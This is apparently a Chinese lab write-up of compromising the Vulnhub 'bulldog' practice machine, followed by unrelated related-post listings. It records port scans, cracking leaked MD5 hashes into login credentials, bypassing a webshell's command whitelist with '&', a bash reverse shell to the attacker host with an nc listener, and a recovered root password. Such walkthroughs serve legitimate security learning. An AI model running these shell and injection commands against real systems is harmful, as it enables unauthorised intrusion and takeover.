Vulnhub----bulldog靶场笔记
前提条件
kali和bulldog靶机的的ip地址在同一个网段
本测试环境:
kali:192.168.56.102
bulldog:192.168.56.101
主机探测
利用kali的netdiscover工具扫描靶机ip地址

kali和bulldog靶机的的ip地址在同一个网段
本测试环境:
kali:192.168.56.102
bulldog:192.168.56.101
扫描靶机端口
利用kali的nmap工具扫描靶机ip地址
nmap -p- 192.168.56.101

扫描目标靶机端口的详细服务信息
nmap -p23,80,8080 -A -T4 192.168.56.101

web服务是python2
用浏览器访问192.168.56.101并未发现异常;接下来扫描网站

发现了 /dev /admin robots.txt
/admin 是一个登录页面,SQL注入并未成功

/robots.txt 并未发现异常

访问/dev,发现了webshell连接,但是显示需要验证身份,可能需要先登录才能有权限使用此webshell

在注释中发现了异常

MD5值加密,使用在线解密网站解密试试。
成功解密两个账号密码:
- nick---bulldog
- sarah---bulldoglover
使用其中一个用户登录成功,然后使用/dev/中的webshell

白名单限制了使用的命令,通过&绕过

- 现在可以使用
echo 'bash -i >& /dev/tcp/192.168.56.102/6666 0>&1'|bash反弹shell到kali上 - kali上用nc侦听6666端口
nc -nvlp 6666

kali机成功获得反弹的shell
提权
使用普通用户的权限并没有发现要获得的信息,于是要提升root权限
在/home目录下发现bulldogadmin文件夹,看文件名觉得里面应该有东西

发现了隐藏文件夹,进去看看里面的东西

使用cat命令没有发现异常,使用strings发现下面了信息,去掉应该H是root密码---> SUPERultimatePASSWORDyouCANTget

在获得的shell界面直接切换root用户报错

于是使用python脚本
python -c 'import pty; pty.spawn("/bin/bash")'

输入刚才获取的密码即可

成功获取flag
后续技能学习:
- 反弹shell脚本,不仅仅限于bash方法
python -c 'import pty; pty.spawn("/bin/bash")'此类常用的shell代码
Vulnhub----bulldog靶场笔记的更多相关文章
- sqli-labs 靶场笔记
sqli-labs 靶场笔记 冲冲冲,好好学习 2020年1月12号 先来点铺垫 分类: 按照请求方法分类: 1.Get型注入:注入参数在get的参数里. 2.POST型注入:注入参数在POST的参数 ...
- VulnHub 实战靶场Breach-1.0
相比于CTF题目,Vulnhub的靶场更贴近于实际一些,而且更加综合考察了知识.在这里记录以下打这个靶场的过程和心得. 测试环境 Kali linux IP:192.168.110.128 Breac ...
- Vulnhub DC-1靶场学习笔记
0x00 环境准备 本文介绍了Vulnhub中DC-1靶机的实战渗透过程,实战的目标是获取到服务器中的5个flag,最终目标是获取到root目录下的thefinalflag文件: 测试环境 备注 Ka ...
- (未完)经典Web漏洞实战演练靶场笔记
记录下自己写的经典Web漏洞靶场的write up,包括了大部分的经典Web漏洞实战场景,做个笔记. 0x01 任意文件下载漏洞 if(!empty($_GET['filename'])){ $fil ...
- CSRF漏洞实战靶场笔记
记录下自己写的CSRF漏洞靶场的write up,包括了大部分的CSRF实战场景,做个笔记. 0x01 无防护GET类型csrf(伪造添加成员请求) 这一关没有任何csrf访问措施 首先我们登录tes ...
- Vulnhub实战靶场:ME AND MY GIRLFRIEND: 1
一.环境搭建 1.官网下载连接:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ 2.下载之后,使用Oracle VM Virtual ...
- vulnhub mrRobot渗透笔记
mrRobot渗透笔记 靶机下载地址:https://www.vulnhub.com/entry/mr-robot-1,151/ kali ip 信息收集 首先依旧时使用nmap扫描靶机的ip地址 n ...
- (未完)XSS漏洞实战靶场笔记
记录下自己写的XSS靶场的write up,也是学习了常见xss漏洞类型的实战场景
- Vulnhub bulldog靶机渗透
配置 VM运行kali,桥接模式设置virtualbox. vbox运行靶机,host-only网络. 信息搜集 nmap -sP 192.168.56.0/24 或者 arp-scan -l #主机 ...
随机推荐
- 7.6、openstack网络拓扑
1.openstack官方架构图: 2.openstack服务常用服务的端口号: mysql:3306 keystone:5000 memcache:11211 rabbitmq:5672 rabbi ...
- webpack(6)webpack处理图片
图片处理url-loader(webpack5之前的处理方式) 在项目开发中,我们时长会需要使用到图片,比如在img文件夹中有图片test1.png,然后在normal.css中会引用到图片 body ...
- 多线程笔记-CancellationToken(取消令牌)
介绍 为什么需要CancellationToken?因为Task没有方法支持在外部取消Task,只能通过一个公共变量存放线程的取消状态,在线程内部通过变量判断线程是否被取消,当Cancella ...
- webpack(11)配置文件分离为开发配置、生成配置和基础配置
前言 上篇我们已经配置好了本地开发服务器,但是配置的相对比较凌乱,一个文件中有些是开发时用到的配置,有些是生成时用到的配置,有些是开发和生成都要用到的配置,所以我们这里把环境分为3个环境 webpac ...
- Linux SecureCRT 终端连接密钥交换失败错误
1.故障现象: 服务器升级OpenSSH和OpenSSL后,SecureCRT无法SSH登录(CRT7.0以上版本可以正常登陆,以下版本报截图错误),但是Putty等工具可以正常登录: 报错如下: S ...
- Serverless与Web后端天生不合?
Serverless/Faas/BaaS 等概念在这几年的技术圈中是绝对的热点词汇之一,国内外众多云厂商也纷纷推出自家的 Serverless 和函数计算产品,微信也依托腾讯云推出了基于 Server ...
- C语言:缓冲区
缓冲区(Buffer)又称为缓存(Cache),是内存空间的一部分.也就是说,计算机在内存中预留了一定的存储空间,用来暂时保存输入或输出的数据,这部分预留的空间就叫做缓冲区(缓存).有时候,从键盘输入 ...
- 【Java数据结构与算法】简单排序、二分查找和异或运算
简单排序 选择排序 概念 首先,找到数组中最小的那个元素,其次,把它和数组的第一个元素交换位置(如果第一个元素就是最小的元素那么它就和自己交换).再次,在剩下的元素中找到最小的元素,将它与数组的第二个 ...
- Java异常情况
从网上了解了这些Java异常,遇到过一些,大部分还没遇到: 1. SQLException:操作数据库异常类. 2. ClassCastException:数据类型转换异常. 3. NumberFor ...
- urllib库中的URL编码解码和GETPOST请求
在urllib库的使用过程中,会在请求发送之前按照发送请求的方式进行编码处理,来使得传递的参数更加的安全,也更加符合模拟浏览器发送请求的形式.这就需要用urllib中的parse模块.parse的使用 ...